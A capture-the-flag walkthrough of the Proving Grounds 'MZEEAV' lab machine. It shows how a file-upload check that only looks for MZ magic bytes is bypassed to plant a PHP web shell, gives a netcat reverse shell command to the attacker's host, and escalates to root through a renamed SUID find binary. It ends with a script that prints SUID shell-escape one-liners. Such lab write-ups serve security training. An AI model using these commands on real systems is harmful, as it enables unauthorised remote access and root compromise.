MZEEAV Offsec Proving Grounds Practice Labor Day CTF Machine Walkthrough

0xRave
Dec 20, 2023


Enumerate harder and check the code! There is a binary file that looks pretty familiar.


Enumeration

sudo nmap -p- -Pn -v $ip -sS -A -T 4 -oN nmap_sS.txt

Port 22 and 80 open.

Port 80

An mzee-av website

Googling "mzee-av exploit" turns up nothing relevant. I then tried uploading a txt file: it redirected us to a listing page, but our uploaded file was not there. Uploading a php file popped an "upload successful" message, but again the php file did not appear in the listing page.

Running dirsearch -u http://$ip -o dirsearch.txt discovers /backups and /upload.

The obvious idea is to upload a php reverse shell and gain an initial foothold, but the file upload behaves strangely, so we need to understand what it checks.

The backup file

Checking the /backups URL shows a backup.zip file. Download and extract it with unzip backup.zip.

backups directory listing

From the files, it looks like the exact same web site we browsed earlier. Checking upload.php should tell us how the upload function works and how to get a php reverse shell through it.

We discover the file upload validation: it checks the file's magic bytes for a PE file (a Windows executable). The annotated upload validation code is below.

#Opens the file that's been uploaded to the temporary location for reading
$F=fopen($tmp_location,"r");

#Reads the first two bytes of the uploaded file.
$magic=fread($F,2);

#Closes the file handle
fclose($F);

#Converts the two bytes in $magic into a hexadecimal string with bin2hex(), keeps the first four hex characters and upper-cases them.
$magicbytes = strtoupper(substr(bin2hex($magic),0,4));

#logging
error_log(print_r("Magicbytes:" . $magicbytes, TRUE));

/* if its not a PEFILE block it - str_contains only php 8*/
//if ( ! (str_contains($magicbytes, '4D5A'))) {

#Searches for '4D5A' within $magicbytes; strpos() returns false if it is not found. Since $magicbytes is only four characters long, this is effectively "the file must start with the bytes MZ".
if ( strpos($magicbytes, '4D5A') === false ) {
echo "Error no valid PEFILE\n";
error_log(print_r("No valid PEFILE", TRUE));
error_log(print_r("MagicBytes:" . $magicbytes, TRUE));
exit ();
}

#If the check passes, the temporary file is renamed to its original uploaded name (and extension), which is why only "PE" files ever show up in the listing.
rename($tmp_location, $location);

From the code, for the uploaded file to keep its name (and show up under /upload), we need to get past this check. It bin2hex()s the first two bytes of the upload and looks for 4D5A; paste that hex into any hex decoder and you get MZ. If you are familiar with PE files you already know that a PE (DOS) executable starts with the two bytes MZ, i.e. 0x4D 0x5A. Note that nothing else is validated: not the extension and not the rest of the content, so a .php file whose first two bytes are MZ passes.

File Upload Bypass

Open Burp and intercept the upload request. We are going to upload a web shell here; you can use a one-liner or the pentest monkey php-reverse-shell.

Sample one-liner: Medium blocked me from writing it as content =(
uploading web shell

Add MZ at the very beginning of the file you are going to upload (before the <?php tag, since only the first two bytes are checked). Then browse to http://$TargetIP/upload/the_reverse_shell_name.php

The web shell I uploaded, executing id as the cmd parameter.

If you are using the pentest monkey shell, remember to change the listening IP and port, and set up a netcat listener before browsing to the file you uploaded.

In my case, I just ran nc -nlvp 80 and executed nc $kaliIP 80 -e /bin/bash from the web shell.

Reverse shell gained.

Privilege Escalation

Checking for SUID binaries with find / -perm /4000 2>/dev/null, we see a file in /opt. As we know, /opt holds add-on software or packages, so a SUID binary there is worth a closer look.

Checking the binary file

Checking the file with ls -al, we can only execute it (no read permission, so we cannot copy it off for analysis). Running it simply lists all files under the current directory recursively. We even tried /root, and it listed everything in /root, which www-data normally cannot do, so the binary really does run with root privileges.

Listing root directory

Then we tried /opt/fileS /root|id. It ran the id command, but as www-data: the pipe is handled by our own shell, not by the binary, so id never ran with the SUID privileges. The target machine does not have strace, gdb or strings installed to help us understand how the binary works.

I tried /opt/fileS -h to try our luck with a help or usage message that might explain how the binary works.

In the end, I got the help menu via /opt/fileS --help.

Help menu

Looks like we can use -exec to execute a command. When we try /opt/fileS -exec id, it returns an error about a missing argument (as becomes clear below, this is find's -exec, which needs a terminating \; or + after the command). After a few tries it still did not work.

I decided to check --version to see whether there is a known exploit for it.

version

It is the find binary! Everything is clear now. Checking GTFOBins, we can execute commands with find when it is SUID. Execute /opt/fileS . -exec /bin/sh -p \; (the -p keeps the effective uid; without it the shell drops back to www-data).

Rooted !

💡 If you are familiar with find's help output, the --help result alone more or less tells you this is a find binary.
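Rather than guessing from the help menu, the --version banner can be matched automatically. The following is an added example (not code from the post) that classifies a renamed SUID binary from its banner and prints the matching SUID escape in the GTFOBins style; the banner table is a small constructed subset (find, bash, python3) to extend as needed, it assumes the binary answers --version the way GNU tools do (as /opt/fileS did), and -perm /4000 is GNU find syntax.

```shell
#!/bin/sh
# Added example: identify what a renamed SUID binary really is and print the
# SUID escape for it. Assumptions: the binary prints a GNU-style --version
# banner; the banner table is a constructed subset; GNU find syntax for -perm.

# Map the first line of a --version banner to a tool name, or "unknown".
tool_from_banner() {
    case "$1" in
        "find (GNU findutils)"*) echo find ;;
        "GNU bash, version"*)    echo bash ;;
        "Python 3"*)             echo python ;;
        *)                       echo unknown ;;
    esac
}

# Run the candidate with --version (stderr dropped) and classify its banner.
identify_binary() {
    banner=$("$1" --version 2>/dev/null | head -n 1)
    tool_from_banner "$banner"
}

# Print the SUID escape for a known tool. "/bin/sh -p" keeps the effective
# uid; a shell started without -p resets it and you are back to www-data.
suid_escape() {
    tool=$1; bin=$2
    case "$tool" in
        find)   printf '%s . -exec /bin/sh -p \\; -quit\n' "$bin" ;;
        bash)   printf '%s -p\n' "$bin" ;;
        python) printf '%s -c %s\n' "$bin" "'import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")'" ;;
        *)      return 1 ;;
    esac
}

# Walk every SUID file under a root (default /), report what each one is and,
# where the tool is known, the one-liner to try. Use -perm -4000 on busybox.
audit_suid() {
    find "${1:-/}" -perm /4000 -type f 2>/dev/null | while read -r bin; do
        tool=$(identify_binary "$bin")
        printf '%-40s %s\n' "$bin" "$tool"
        [ "$tool" != unknown ] && suid_escape "$tool" "$bin"
    done
}
```

On the lab box, audit_suid /opt would print /opt/fileS as find together with the exact command used above. The identification step is also the defensive check: a SUID file whose banner belongs to a standard tool but whose path or name does not is exactly what a baseline of expected SUID binaries should flag.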

Congratz!! I hope you learned something from this walkthrough. Check out my stories for other Proving Grounds machine walkthroughs, and leave a comment if you found another way to pwn this machine.
